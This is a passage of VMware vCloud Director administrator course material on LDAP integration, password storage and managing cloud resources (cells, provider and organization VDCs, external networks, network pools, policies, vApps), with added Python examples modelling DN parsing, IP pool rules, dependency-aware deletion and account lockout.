Figure (slide diagram): a tree rooted at dc=acme, dc=com with two branches, dc=newtech and dc=oldtech; under dc=newtech is ou=sales containing cn=Jane Smith, and under dc=oldtech is ou=engineering containing cn=Jane Smith.
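The DN syntax from slides 6-31 and 6-32, together with the import rules from slides 6-25 and 6-26 (users are pulled from the target OU only, with no recursive OU import, and each organization needs its own OU), can be exercised with a small DN parser. This is an added example, not VMware code; the two Jane Smith entries are the slide's, while the function names and the organization-to-OU table are assumptions made for the example.

```python
"""Parse LDAP distinguished names and apply the vCloud Director import rules.
Added example, not VMware code: the helper names are assumptions; the sample
DNs are the two Jane Smith entries from the slide.
"""
from typing import Dict, List, Tuple

RDN = Tuple[str, str]  # (attribute type, value); type lowercased, value as written


def parse_dn(dn: str) -> List[RDN]:
    """Split a DN into RDNs, leaf first: 'cn=Jane Smith, ou=Sales, dc=acme, dc = com'.

    A comma escaped as '\\,' stays inside the value (cn=Smith\\, Jane). Whitespace
    around '=' and ',' is dropped and runs of spaces inside a value are collapsed.
    """
    parts, buf, escaped = [], "", False
    for ch in dn:
        if escaped:
            buf, escaped = buf + ch, False
        elif ch == "\\":
            escaped = True
        elif ch == ",":
            parts.append(buf)
            buf = ""
        else:
            buf += ch
    parts.append(buf)
    out: List[RDN] = []
    for part in parts:
        if "=" not in part:
            raise ValueError(f"malformed RDN {part!r} in {dn!r}")
        attr, value = part.split("=", 1)
        out.append((attr.strip().lower(), " ".join(value.split())))
    return out


def normalize(dn: str) -> str:
    """Canonical form for comparison; cn/ou/dc values are case-insensitive in LDAP."""
    return ",".join(f"{a}={v.lower()}" for a, v in parse_dn(dn))


def rdn(dn: str) -> str:
    """The relative distinguished name: the leaf, like a file name."""
    a, v = parse_dn(dn)[0]
    return f"{a}={v}"


def parent(dn: str) -> str:
    """The container the entry sits in, like the folder, in normalized form."""
    return ",".join(f"{a}={v.lower()}" for a, v in parse_dn(dn)[1:])


def base_dn(dn: str) -> str:
    """Domain components only; this is the part supplied in the connection string."""
    return ",".join(f"{a}={v.lower()}" for a, v in parse_dn(dn) if a == "dc")


def same_entry(dn_a: str, dn_b: str) -> bool:
    return normalize(dn_a) == normalize(dn_b)


def importable_for(entry_dn: str, org_ou_dn: str) -> bool:
    """vCloud Director pulls users from the configured OU only: the entry's
    direct parent must be that OU; entries in sub-OUs are not imported."""
    return parent(entry_dn) == normalize(org_ou_dn)


def unique_ous(orgs: Dict[str, str]) -> bool:
    """Multitenancy check for organizations sharing one LDAP server:
    every organization must point at a different OU."""
    return len({normalize(ou) for ou in orgs.values()}) == len(orgs)


# Constructed sample data, taken from the slide.
JANE_SALES = "cn=Jane Smith, ou=Sales, dc=Newtech, dc=acme, dc = com"
JANE_ENG = "cn=Jane Smith, ou=Engineering, dc=Oldtech, dc=acme, dc = com"

if __name__ == "__main__":
    print(rdn(JANE_SALES), "|", parent(JANE_SALES), "|", base_dn(JANE_SALES))
    print("same entry?", same_entry(JANE_SALES, JANE_ENG))
```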

Common LDAP Attributes (Slide 6-33)

• Check with your LDAP administrator to confirm that you are using the correct schema. Different LDAP systems use different attributes.

The schema used by different LDAP systems might vary. Check with your LDAP administrator to confirm that you are using the correct schema for your vCloud Director configuration. If your schema is configured incorrectly, then you will not be able to execute searches on the LDAP directory.

This slide shows two different possible configurations that are used in OpenLDAP. Both of these have minor differences with Active Directory.

Querying LDAP Attributes (Slide 6-34)

• Missing data might simply indicate that the LDAP database did not have values in all of the fields that you queried. Mismatches on attributes might cause searches to fail.

Even if the LDAP attributes in vCloud Director are configured correctly, you might have errors returned on a search. Errors can occur if data is not present in the LDAP directory. An example would be a user who does not have an email address or telephone number listed in the directory.

LDAP at the Organization Level (Slide 6-35)

• You can specify a custom LDAP at the organization level, which allows each organization to have a different (private) LDAP system.
• If you bind all of your organizations to the same LDAP server (for example, in a private cloud), VMware® recommends that each organization have a unique OU.
• Only vCloud Director system administrators can configure LDAP for organizations.
• After LDAP is configured, organization administrators can import LDAP users and groups.

At the organization level, vCloud Director presents three options:

1. Do not use LDAP. All of the users in this organization will be internally defined within the vCloud Director system.

2. Use the vCloud Director system LDAP service. The organization uses the LDAP service that has been configured at the system level. To leverage the system-defined LDAP, all organization users must be defined in the same Organization Unit (OU) in the LDAP database. You must configure that OU here. VMware recommends that different organizations have unique OUs within LDAP. The use of unique OUs preserves multitenancy. Using one system-wide LDAP service with unique OUs for each organization is a VMware best practice for a private cloud configuration.

3. Use a custom LDAP server. A custom LDAP server enables an organization to use its own LDAP service. VMware recommends the use of custom LDAP servers in public cloud implementations.

Password Protection (Slide 6-36)

• LDAP user passwords are never stored in the vCloud Director database.
• Local user passwords are salted and hashed before storage in the vCloud Director database.
• vCloud Director also maintains other passwords for accessing certificates, databases, VMware® vCenter Server systems, and VMware® vShield Manager servers:
  - These passwords are encrypted using a unique key per vCloud Director installation.
  - These passwords are stored in $VCLOUD_HOME/etc/global.properties.

LDAP users will never have their passwords stored in the vCloud Director database. Any users that are defined internally to vCloud Director will have their passwords stored in the vCloud Director database in an encrypted and salted form.

vCloud Director also stores some passwords. These include passwords for accessing certificates, databases, VMware® vCenter™ servers, and VMware® vShield Manager™ servers. All of these passwords are stored in encrypted form in the file $VCLOUD_HOME/etc/global.properties on the vCloud Director server. Carefully protect any backups that contain that file.

vCloud End-User Single Sign-On

Slide 6-38

vCloud Director user IDs and passwords are for users who have administrative responsibilities within the vCloud Director system. Cloud administrative users include catalog authors, vApp authors, and organization administrators. LDAP and vCloud Director user accounts are not required for end users.

You can configure a single sign-on service for end users with VMware® Horizon Application Manager™. VMware® Horizon Application Manager™ enables you to integrate end-user cloud security with numerous third-party applications.

VMware® Horizon Application Manager:
• Secures end-user access to software as a service (SaaS) and Web applications across different devices
• Provisions and entitles secure access
• Tracks SaaS license activity
• Generates usage reports
• Used with applications such as the following:
  - Google Apps
  - Salesforce.com
  - WebEx
  - American Airlines
  - Facebook
  - ADP
  - Mozy

Security Best Practices

Slide 6-39

For best practices on hardening your vCloud implementation, see these documents:
• VMware Security Advisories, Certifications & Guides: https://www.vmware.com/support/support-resources/hardening-guides.html
• VMware vCloud Architecture Toolkit (vCAT 3.1): http://www.vmware.com/cloud-computing/cloud-architecture/vcat-toolkit3.html

All documents can be found at http://www.vmware.com


Lab 11: Integrating LDAP and Active Directory

Slide 6-40

Integrate LDAP into a VMware vCloud


Review of Learner Objectives

Slide 6-41

You should be able to meet the following objectives:

Create custom vCloud Director security roles

Integrate LDAP servers with vCloud Director


Key Points

Slide 6-42

vCloud Director has several predefined security roles.

System administrators can create custom security roles.

LDAP systems can be integrated into vCloud at both the system and organization level.

Questions?


MODULE 7

Managing VMware vCloud Director Resources

Slide 7-1


You Are Here

Slide 7-2

Course Introduction
VMware vCloud Director Architecture and Components
VMware vCloud Director Networking
VMware vCloud Director Providers
VMware vCloud Director Organizations
VMware vCloud Director Basic Security
Managing VMware vCloud Director Resources
Managing VMware vSphere Resources
Monitoring VMware vCloud Director Components
VMware vCloud Director Organization Users
VMware vCloud Director Installation

Importance

Slide 7-3

Effective management of VMware® vCloud Director® resources (providers and networks) ensures that customers always have the resources they need while using corporate IT assets.

Effective management of vCloud Director resources also ensures the highest efficiency and cost-effectiveness in their use.

Lesson 1: Managing Cloud Resources as a System Administrator

Slide 7-5


Learner Objectives

Slide 7-6

By the end of this lesson, you should be able to meet the following objectives:

Use the cell management tool to perform basic cell maintenance tasks

Manage provider and organization virtual data centers

Manage external networks and edge gateways

Prepare and unprepare VMware® ESXi hosts

Configure and send email notifications

Cloud Cell Maintenance Message

Slide 7-8

If you want to stop a cell and let users know that you are performing maintenance, you can turn on the maintenance message.

When the maintenance message is turned on, users who attempt to log in to the cell from a browser see a message stating that the cell is down for maintenance. Users who attempt to reach the cell using the VMware vCloud® API receive a similar message.

Turn on the cloud cell maintenance message during maintenance:
• Displayed whenever users try to access the vCloud Director interface

To enable the maintenance message, use these commands:

    # service vmware-vcd stop
    # /opt/vmware/vcloud-director/bin/vmware-vcd-cell maintenance

To disable the maintenance message, use these commands:

    # /opt/vmware/vcloud-director/bin/vmware-vcd-cell stop
    # service vmware-vcd start


Cell Management Tool (1)

Slide 7-9

The cell management tool is located in /opt/vmware/vcloud-director/bin.

To list available commands, at the command prompt, type cell-management-tool -h.

Commands:
• cell
  - Suspends the task scheduler
  - Checks the status of active tasks
  - Shuts down the cell gracefully
• dbextract
  - Exports data from the vCloud Director database
• certificates
  - Replaces the cell's SSL certificates

Cell Management Tool (2)

Slide 7-10

Commands:
• generate-certs
  - Generates new self-signed SSL certificates for the cell
• recover-password
  - Recovers the vCloud Director system administrator password
  - Requires knowledge of the vCloud Director database user name and password


Provider Virtual Data Center Management

Slide 7-11

After you create a provider virtual data center (VDC), you can modify its properties, disable or delete it, and manage its VMware® ESXi™ hosts and datastores.

Disabling a provider VDC prevents the creation of organization VDCs that use the provider VDC resources. When a provider VDC is disabled, vCloud Director also disables the organization VDCs that use its resources. If VMware vSphere® vApps™ are running and you have powered-on virtual machines, these virtual machines continue to run, but you cannot create or start additional vApps or virtual machines on this disabled provider VDC.

When you delete a provider VDC, it removes its compute, memory, and storage resources from vCloud Director, although the resources remain unaffected in VMware vSphere®. As with each hierarchy-dependent construct in vCloud Director, the construct, or object, cannot be deleted until the administrator manually resolves dependencies. To delete a provider VDC, you must first resolve the dependencies by disabling and deleting the dependent objects.

You can upgrade the hardware version based on the capabilities of the ESXi hosts in use. Downgrading the highest supported hardware version is not supported.

• Enable and disable a provider virtual data center (VDC)
  - When disabled:
    - New organizations cannot be created.
    - vApps cannot be created, deployed from the catalog, nor started.
    - Already-running VMware vSphere® vApps and powered-on virtual machines continue to run.
• Delete a provider VDC
  - Delete a provider VDC to release its compute, memory, and storage resources from vCloud Director.
  - Dependencies must be deleted first
• Upgrade the hardware version supported by a provider VDC
  - The selected hardware version must be supported by the underlying VMware vSphere® infrastructure.
  - Downgrading the hardware version is not supported.
• Merge with another provider VDC
  - Combine two provider VDCs into a single managed provider.


Managing External Networks

Slide 7-12

You can enable and disable external networks in the network properties page, under the Network Specification tab. When you disable an external network you are disabling the pool resources available for the network, including any static IP pool ranges. Because the static IP pool is disabled, you cannot create edge gateways nor run vApps or virtual machines that require static IP pool allocation from the external network.

When an external network is disabled, the network continues to pass traffic. Already-deployed edge gateways and running direct-connect organization VDC networks continue to operate and continue to have whatever connectivity has been configured.

You can change certain aspects of the network specification of an external network, but you cannot change the Gateway IP address or the subnet mask. You can change the DNS parameters and the DNS relay setting. You can manage the static IP pool by adding, removing, and modifying IP address ranges.

When managing the static IP pool for an external network it is important to remember to check the current IP allocations table. You cannot delete a static IP range that contains an already-allocated IP address. Likewise, you cannot modify an existing IP range in a manner that would exclude an already-allocated IP address.

If you need to change the subnet characteristics of an external network, create a new external network with those characteristics.

You can delete an external network once all dependencies on that network have been removed. Dependencies include edge gateways and other direct-connect organization VDC networks. Resolve dependencies by shutting down, disabling, and deleting the dependent objects or by changing the dependent relationship.

• Enable and disable an external network
  - When disabled:
    - Existing edge gateways and direct-connect organization VDC networks are unaffected.
    - Network traffic is not blocked. Instead, additional allocation of resources is disabled, such as the static IP pool.
• Change DNS parameters used by an external network
• Add, remove, and modify static IP pool ranges used by an external network
  - Added ranges must be relevant to the subnet specification.
  - You cannot remove a range that contains already-allocated addresses.
  - You cannot modify a range that contains already-allocated addresses unless the resulting range includes the registered allocations.
• Delete an external network
  - Dependencies must be deleted first
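The three static IP pool rules above (added ranges must fit the subnet, a range with allocations cannot be removed, and a range can only be changed if the new range still covers every registered allocation) are easy to get wrong by hand against a long allocations table. The following is an added example, not vCloud Director's code, that models exactly those rules with the Python standard library's ipaddress module. The class, method names and the 192.0.2.0/24 sample network are constructed for illustration and do not reflect how vCloud Director stores pools internally.

```python
"""Added example (not vCloud Director's code): the static IP pool rules for an
external network, modelled with the standard library's ipaddress module."""
import ipaddress
from typing import Callable, List, Set, Tuple

Addr = ipaddress.IPv4Address
Range = Tuple[Addr, Addr]  # inclusive first and last address


class StaticIpPool:
    """Static IP pool of one external network.

    Rules taken from the text: added ranges must lie inside the network's subnet;
    a range holding allocated addresses cannot be removed; a range can only be
    modified if the new range still covers every allocated address in the old one.
    """

    def __init__(self, subnet: str) -> None:
        self.subnet = ipaddress.IPv4Network(subnet, strict=True)
        self.ranges: List[Range] = []
        self.allocated: Set[Addr] = set()

    def _parse(self, first: str, last: str) -> Range:
        lo, hi = ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
        if lo > hi:
            raise ValueError(f"range {first}-{last} is reversed")
        # "Added ranges must be relevant to the subnet specification."
        if lo not in self.subnet or hi not in self.subnet:
            raise ValueError(f"range {first}-{last} is outside {self.subnet}")
        return lo, hi

    def add_range(self, first: str, last: str) -> None:
        self.ranges.append(self._parse(first, last))

    def allocate(self, address: str) -> None:
        """Record that an address from the pool has been handed out."""
        addr = ipaddress.IPv4Address(address)
        if not any(lo <= addr <= hi for lo, hi in self.ranges):
            raise ValueError(f"{address} is not inside any pool range")
        if addr in self.allocated:
            raise ValueError(f"{address} is already allocated")
        self.allocated.add(addr)

    def _allocations_in(self, rng: Range) -> Set[Addr]:
        return {a for a in self.allocated if rng[0] <= a <= rng[1]}

    def remove_range(self, first: str, last: str) -> None:
        rng = self._parse(first, last)
        if rng not in self.ranges:
            raise KeyError(f"range {first}-{last} is not in the pool")
        # "You cannot remove a range that contains already-allocated addresses."
        held = self._allocations_in(rng)
        if held:
            raise ValueError(f"cannot remove: {sorted(map(str, held))} still allocated")
        self.ranges.remove(rng)

    def modify_range(self, old: Tuple[str, str], new: Tuple[str, str]) -> None:
        old_rng, new_rng = self._parse(*old), self._parse(*new)
        if old_rng not in self.ranges:
            raise KeyError(f"range {old[0]}-{old[1]} is not in the pool")
        # "...unless the resulting range includes the registered allocations."
        orphaned = {a for a in self._allocations_in(old_rng)
                    if not (new_rng[0] <= a <= new_rng[1])}
        if orphaned:
            raise ValueError(f"cannot shrink: {sorted(map(str, orphaned))} would be excluded")
        self.ranges[self.ranges.index(old_rng)] = new_rng


def attempt(action: Callable[..., None], *args) -> bool:
    """Run one pool operation and report whether the pool accepted it."""
    try:
        action(*args)
        return True
    except (ValueError, KeyError):
        return False


if __name__ == "__main__":
    pool = StaticIpPool("192.0.2.0/24")  # constructed sample external network
    print(attempt(pool.add_range, "192.0.2.10", "192.0.2.20"))     # True
    print(attempt(pool.add_range, "192.0.3.1", "192.0.3.5"))       # False: outside subnet
    pool.allocate("192.0.2.15")
    print(attempt(pool.remove_range, "192.0.2.10", "192.0.2.20"))  # False: .15 allocated
    print(attempt(pool.modify_range, ("192.0.2.10", "192.0.2.20"),
                  ("192.0.2.10", "192.0.2.14")))                   # False: would orphan .15
    print(attempt(pool.modify_range, ("192.0.2.10", "192.0.2.20"),
                  ("192.0.2.12", "192.0.2.30")))                   # True: still covers .15
```

The check in `modify_range` is the one the text stresses: shrinking or shifting a range is permitted only when every currently allocated address in the old range is still inside the new one, which is exactly what the "current IP allocations table" is consulted for.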


Managing Network Pools

Slide 7-13

After you create a network pool, you can modify its name and description or delete it. Depending on the type of network pool, you can also add port groups, Cloud isolated networks, and VLAN IDs.

You can add Cloud isolated networks to a vCloud Director network isolation-backed network pool. Verify that you have a network pool that is backed by a port group and verify that you have an available port group in vSphere.

You can delete a network pool to remove it from vCloud Director provided that it satisfies the following prerequisites:
• No organization VDC is associated with the network pool.
• No vApps use the network pool.
• No NAT-routed or internal organization VDC networks use the network pool.

• Delete a network pool
  - Dependencies must be deleted first
• Depending on the type of network pool, you can do the following:
  - Add and remove port groups.
  - Add and remove isolation-backed networks.
  - Add, remove, and change VLAN ID ranges.

Organization Virtual Data Center Management: System Administrator

Slide 7-14

As a system administrator, you have complete configuration control over each organization VDC with few limitations. The system administrator cannot change the fundamental allocation model of an organization VDC. The system administrator can, at any time, change the characteristics and settings associated with the selected allocation model, including reservations, guarantees, policy limits, and maximum leases. These settings affect only vApps that you start from this point on. Existing vApps must be stopped and then restarted for new policy and allocation model changes to take effect.

Only a system administrator can:
• Change the allocation model properties of an organization VDC
  - Reservations and guarantees, policy quotas
  - The allocation model type cannot be changed
• Configure thin and fast provisioning options of an organization VDC
• Change the network pool type and size used by an organization VDC
• Disable an organization VDC
  - When disabled:
    - New vApps cannot be created or deployed from the catalog
    - Existing vApps continue to run unaffected
• Delete an organization VDC
  - Dependencies must be deleted first

The system administrator is the only role that can create organization VDC networks that directly connect to an external network entity and manage external network suballocation IP pools. Organization administrators must rely on a system administrator for these tasks.

Additionally, a system administrator controls:
• Network pool properties used by the organization VDC
  - The network pool used by the organization VDC can be changed to some other pool and the number of networks updated.
• Storage policies used by the organization VDC
  - Thin-provisioning and fast-provisioning options can be changed at any time.

You cannot change the allocation model of an organization VDC. However, you can create additional organization VDCs backed by the same, or some other, provider. Each organization VDC can have a different allocation model. For example, this ability might be useful for migrating an organization from a reservation pool to a pay-as-you-go model.

When you disable an organization VDC, you prevent the use of its compute and storage resources by other vApps and virtual machines. vApps that are running and powered-on virtual machines continue to run but you cannot create or start additional vApps or virtual machines.

When you delete an organization VDC, it removes its compute, memory, and storage resources from the organization. The resources remain unaffected in the source provider VDC. Dependencies must be resolved before an organization VDC can be deleted.
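The provider VDC, external network, network pool and organization VDC passages in this lesson all state the same two rules: disabling an object stops new allocations from it (and, for a provider VDC, cascades to its organization VDCs) while already-running vApps keep running, and an object cannot be deleted until everything that depends on it has been removed. The following is an added example, not vCloud Director's code, that models that behaviour as a small in-memory inventory so the cascade and the delete guard can be exercised end to end. Object kinds, names and the `Inventory` class are constructed for illustration; the product's real dependency graph is richer than this.

```python
"""Added example (not vCloud Director's code): a small inventory model of the
disable and delete rules shared by provider VDCs, organization VDCs, external
networks and network pools, as described in the text."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


class DependencyError(Exception):
    """An object still has dependents and therefore cannot be deleted."""


@dataclass
class CloudObject:
    name: str
    kind: str                          # e.g. "provider_vdc", "org_vdc", "network_pool", "vapp"
    depends_on: Tuple[str, ...] = ()   # names of the objects this one is backed by
    enabled: bool = True
    running: bool = False              # meaningful for vApps only


class Inventory:
    def __init__(self) -> None:
        self.objects: Dict[str, CloudObject] = {}

    def add(self, obj: CloudObject) -> None:
        """Creating an object requires every object it depends on to be enabled."""
        for dep in obj.depends_on:
            parent = self.objects[dep]
            if not parent.enabled:
                raise ValueError(f"{parent.kind} {dep} is disabled; cannot create {obj.name}")
        self.objects[obj.name] = obj

    def dependents(self, name: str) -> List[CloudObject]:
        return [o for o in self.objects.values() if name in o.depends_on]

    def disable(self, name: str) -> None:
        """Disable an object. A disabled provider VDC also disables the organization
        VDCs that use it; running vApps are left running."""
        obj = self.objects[name]
        obj.enabled = False
        if obj.kind == "provider_vdc":
            for child in self.dependents(name):
                if child.kind == "org_vdc":
                    self.disable(child.name)

    def start_vapp(self, name: str) -> None:
        """A vApp can only be started when the objects backing it are enabled."""
        vapp = self.objects[name]
        for dep in vapp.depends_on:
            if not self.objects[dep].enabled:
                raise ValueError(f"{dep} is disabled; cannot start {name}")
        vapp.running = True

    def stop_vapp(self, name: str) -> None:
        self.objects[name].running = False

    def delete(self, name: str) -> None:
        """Dependencies must be deleted first."""
        blockers = self.dependents(name)
        if blockers:
            raise DependencyError(f"{name} still has dependents: {[b.name for b in blockers]}")
        del self.objects[name]


def attempt(action: Callable[..., None], *args) -> bool:
    """Run one operation and report whether the inventory accepted it."""
    try:
        action(*args)
        return True
    except (ValueError, KeyError, DependencyError):
        return False


def scenario() -> Dict[str, bool]:
    """Walk a constructed hierarchy through disable and delete and record outcomes."""
    inv = Inventory()
    inv.add(CloudObject("pvdc-01", "provider_vdc"))
    inv.add(CloudObject("pool-01", "network_pool"))
    inv.add(CloudObject("ovdc-a", "org_vdc", ("pvdc-01", "pool-01")))
    inv.add(CloudObject("web", "vapp", ("ovdc-a",)))
    inv.add(CloudObject("db", "vapp", ("ovdc-a",)))
    inv.start_vapp("web")
    out: Dict[str, bool] = {}
    inv.disable("pvdc-01")
    out["org_vdc_cascaded"] = not inv.objects["ovdc-a"].enabled
    out["running_vapp_kept_running"] = inv.objects["web"].running
    out["new_vapp_in_disabled_vdc"] = attempt(inv.add, CloudObject("new", "vapp", ("ovdc-a",)))
    out["start_stopped_vapp"] = attempt(inv.start_vapp, "db")
    out["delete_pvdc_with_dependents"] = attempt(inv.delete, "pvdc-01")
    inv.stop_vapp("web")
    for name in ("web", "db", "ovdc-a"):      # resolve dependencies bottom-up
        inv.delete(name)
    out["delete_pvdc_after_cleanup"] = attempt(inv.delete, "pvdc-01")
    out["delete_pool_after_cleanup"] = attempt(inv.delete, "pool-01")
    return out


if __name__ == "__main__":
    for key, value in scenario().items():
        print(f"{key}: {value}")
```

The order of the cleanup loop is the point of the "dependencies must be deleted first" rule: the vApps go before the organization VDC, and the organization VDC before the provider VDC and the network pool that back it.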

Email Notifications

Slide 7-15

vCloud Director requires a Simple Mail Transport Protocol (SMTP) server to send user notification and system alert emails. You can modify the settings that you specified when you created the organization.

You can send an email notification to all users in the entire installation, all system administrators, or all organization administrators. You can send an email notification to notify users about upcoming system maintenance, for example.

vCloud Director sends system alert emails when it has important information to report. For example, vCloud Director sends an alert when a datastore is running out of space. You can configure vCloud Director to send email alerts to all system administrators or to a specified list of email addresses. For example, you can send an email notification to notify users about upcoming system maintenance.

For both the SMTP settings and the Email notification settings, an organization administrator may choose to keep the system administrator-defined settings, or define new settings. At a minimum an organization administrator may want to change Email notification settings so that all emails are branded appropriately. An organization administrator can also override SMTP settings if an SMTP server is available for organization use.

• SMTP server settings can be defined at the system level.
• Organizations may inherit or override the system-level SMTP settings.
• Email notifications are contextual to the target object or functional category.
  - When a data container is selected for an email notification, such as a provider VDC or organization VDC, the email notification is automatically addressed to all users with items in that container.
  - When a user container is selected, such as an organization, the email notification can be addressed to any relevant user group.

Lab 12: Managing Cloud Resources

Slide 7-16

Manage cloud resources as a system administrator

Review of Learner Objectives

Slide 7-17

 You should be able to meet the following objectives:

Use the cell management tool to perform basic cell maintenance tasks

Manage provider and organization virtual data centers

Manage external networks and edge gateways

Prepare and unprepare VMware® ESXi hosts

Configure and send email notifications


Lesson 2: Managing Organization Resources

Slide 7-18

Learner Objectives

Slide 7-19

By the end of this lesson, you should be able to meet the following objectives:

Manage organization policies

Manage organization edge gateways and networks

Manage vApps

Configure organization email notifications


Managing Organization Policies

Slide 7-20

An organization administrator has full control over the organization policy except for the policy limits imposed by a system administrator. Limits relating to resource-intensive operations and network consumption per virtual machine are locked. An organization administrator can reconfigure lease and quota settings, and configure account lockout parameters.

• System and organization administrators can update the organization policy.
  - Leases: Maximum running and storage durations, cleanup option
  - Default quotas for users: Maximum virtual machines per user, running machines per user
  - Account lockout: Number of invalid logins allowed, lockout duration
• Only a system administrator can change policy limits.
  - Number of resource-intensive operations and simultaneous connections per virtual machine
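Of the organization policy settings listed above, account lockout is the one with direct security effect, and its two parameters (number of invalid logins allowed, lockout duration) interact in ways worth seeing concretely: a correct password presented during the lockout window is still refused, and a successful login resets the failure counter. The following is an added example, not vCloud Director's code, that implements a lockout policy of that shape and replays it over a constructed sequence of login attempts with an injected clock so the outcome is deterministic. The class names, the 3-attempt / 600-second values and the sample events are constructed; they do not describe how vCloud Director itself implements the feature.

```python
"""Added example (not vCloud Director's code): an account lockout policy of the
shape described above (invalid logins allowed, lockout duration), replayed over a
constructed sequence of login attempts."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass
class LockoutPolicy:
    invalid_logins_allowed: int    # consecutive failures before the account locks
    lockout_seconds: int           # how long the lock lasts


@dataclass
class AccountState:
    failures: int = 0
    locked_until: float = 0.0      # 0.0 means not locked


class LockoutTracker:
    def __init__(self, policy: LockoutPolicy) -> None:
        self.policy = policy
        self.accounts: Dict[str, AccountState] = {}

    def attempt(self, user: str, credential_ok: bool, now: float) -> str:
        """Process one login attempt at time `now` (seconds).

        Returns "locked", "success" or "failure". While locked, the credential is
        not evaluated at all, so a correct password inside the window is refused.
        """
        state = self.accounts.setdefault(user, AccountState())
        if state.locked_until:
            if now < state.locked_until:
                return "locked"
            state.failures = 0           # lock expired: start a fresh count
            state.locked_until = 0.0
        if credential_ok:
            state.failures = 0           # a good login resets the counter
            return "success"
        state.failures += 1
        if state.failures >= self.policy.invalid_logins_allowed:
            state.locked_until = now + self.policy.lockout_seconds
        return "failure"


# Constructed login events: (seconds since start, user, credential correct?)
SAMPLE_EVENTS: List[Tuple[float, str, bool]] = [
    (0, "alice", False),
    (5, "alice", False),
    (9, "alice", False),     # third failure: alice locks for the policy duration
    (12, "alice", True),     # correct password, but inside the lockout window
    (30, "bob", True),       # other accounts are unaffected
    (700, "alice", True),    # window over: succeeds and resets the counter
]


def replay(events: Iterable[Tuple[float, str, bool]],
           policy: LockoutPolicy) -> List[Tuple[str, str]]:
    """Feed the events to a fresh tracker and return (user, outcome) pairs."""
    tracker = LockoutTracker(policy)
    return [(user, tracker.attempt(user, ok, t)) for t, user, ok in events]


def locked_attempts(outcomes: Iterable[Tuple[str, str]]) -> Dict[str, int]:
    """Count attempts refused while locked, per user. A rising count on one
    account is the signal an administrator would want to review."""
    counts: Dict[str, int] = {}
    for user, outcome in outcomes:
        if outcome == "locked":
            counts[user] = counts.get(user, 0) + 1
    return counts


if __name__ == "__main__":
    policy = LockoutPolicy(invalid_logins_allowed=3, lockout_seconds=600)
    results = replay(SAMPLE_EVENTS, policy)
    for user, outcome in results:
        print(f"{user:6} {outcome}")
    print(locked_attempts(results))   # {'alice': 1}
```

Two design points carry over to any lockout implementation: the check for an active lock happens before the credential is looked at, and the lock expiry clears the counter so that a user who waits out the window gets the full allowance again rather than locking on the next single failure.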

Managing Organization Virtual Data Center Edge Gateways

Slide 7-21

Organization administrators can redeploy edge gateways and reapply edge gateway service configurations. Organization administrators also have full control over rate limits set on each edge gateway for inbound and outbound network throughput.

An organization administrator cannot configure external networks attached to an edge gateway, or manage suballocated IP pools.

System and organization administrators can:
• Redeploy an edge gateway
  - Deploy a new instance of the edge gateway with the same service configuration.
• Reapply an edge gateway service configuration
• Enable or disable an edge gateway
• Configure traffic limits imposed by an edge gateway
  - Inbound and outbound limits for each external network that the edge gateway connects to.
• Synchronize syslog server settings to an edge gateway


Managing Organization Virtual Data Center Networks

Slide 7-22

Organization administrators can create routed and isolated organization VDC networks. This is a new feature as of vCloud Director version 5.1. An organization administrator has full control over each organization VDC network that does not directly connect to an external network. For each organization VDC network, an organization administrator can change DNS resolution settings and manage static IP pools.

Neither a system administrator nor an organization administrator can change the subnet defined by an organization VDC network. If you must have an organization VDC network that defines a different subnet, create an organization VDC network.

System and organization administrators can:
• Create new routed organization VDC networks:
  - Networks that connect to an edge gateway device
• Create new isolated organization VDC networks:
  - Networks that do not connect to an edge gateway device
• Change the DNS settings for an organization VDC network.
• Manage static IP pools for an organization VDC network.
  - The network range and subnet mask cannot be changed.


Managing vApps

Slide 7-24

A system administrator can place a vApp in maintenance mode to prevent nonadministrator users from changing the state of the vApp. This prevention is useful, for example, when you want to back up a vApp using a third-party backup solution.

When a vApp is in maintenance mode, nonadministrator users cannot perform any actions that modify the state of the vApp or its virtual machines. They can view information about the vApp and its virtual machines and access the virtual machine consoles. Placing a vApp in maintenance mode does not affect any currently running tasks that involve the vApp.

A system administrator can “force stop” a running vApp when an organization user is unable to do so. In some cases, a user might be unable to stop a running vApp. If traditional methods for stopping the vApp fail, you can force stop the vApp to prevent the user from getting billed. Force stopping a vApp does not prevent the vApp from consuming resources in vSphere. After you force stop a vApp in vCloud Director, use the VMware vSphere® Client™ to check the status of the vApp in vSphere and take the necessary action.

System administrators can perform these vApp management tasks:
• Add vSphere virtual machines to an existing vApp
• Create a vApp based on a vSphere virtual machine
• Force a vApp to enter maintenance mode
  - Place a vApp in maintenance mode to prevent nonadministrator users from changing the state of the vApp, including the vApp owner.
  - Maintenance mode is useful for backing up vApps with third-party software.
  - Placing a vApp into maintenance mode does not affect currently running tasks that involve the vApp.

Other roles do not have rights to these actions.

Lab 13: Managing Organization Resources

Slide 7-25

Manage resources as an organization administrator 


Review of Learner Objectives

Slide 7-26

 You should be able to meet the following objectives:

Manage organization policies

Manage organization edge gateways and networks

Manage vApps

Configure organization email notifications

Key Points

Slide 7-27

• Provider VDCs, organization VDCs, external networks, organization VDC networks, and network pools are considered cloud resources.
• After you add cloud resources to vCloud Director, you can modify them and view information about their relationships with one another.
• Most management of cloud cells is done from the vCloud Director server.

Questions?

MODULE 8

Managing VMware vSphere Resources

Slide 8-1

You Are Here

Slide 8-2

Course Introduction

VMware vCloud Director Architecture and Components

VMware vCloud Director Networking

VMware vCloud Director Providers

VMware vCloud Director Organizations

VMware vCloud Director Basic Security

Managing VMware vCloud Director Resources

Managing VMware vSphere Resources

Monitoring VMware vCloud Director Components

VMware vCloud Director Organization Users

VMware vCloud Director Installation

Importance

Slide 8-3

VMware vSphere® is the foundation layer for VMware® vCloud Director®.

vSphere provides the compute, storage, and networking resources required for the cloud. Knowing how to manage these vSphere resources from vCloud Director is critical.

In this module, you will learn how to manage vSphere resources from the vCloud Director console.

Learner Objectives

Slide 8-4

By the end of this module, you should be able to meet the following objectives:

Manage the following vSphere resources:

VMware® vCenter Server systems

Resource pools

VMware® ESXi hosts

vSphere datastores and datastore clusters

vSphere storage policies

Switches and port groups

Stranded items

vCloud Director in the vSphere Web Client

Slide 8-5

You can see that VMware® vCloud Director® has been connected to VMware® vCenter Server™ in the VMware vSphere® Web Client. Go to Home > vCenter Server Extensions. vCloud Director 5.1 does not communicate status to the vCenter Server system.

vCloud Director appears as an extension in the VMware vSphere® Web Client under vCenter Solutions Manager after it has been registered with vCenter Server.

vCloud Director does not communicate status to vCenter Server.

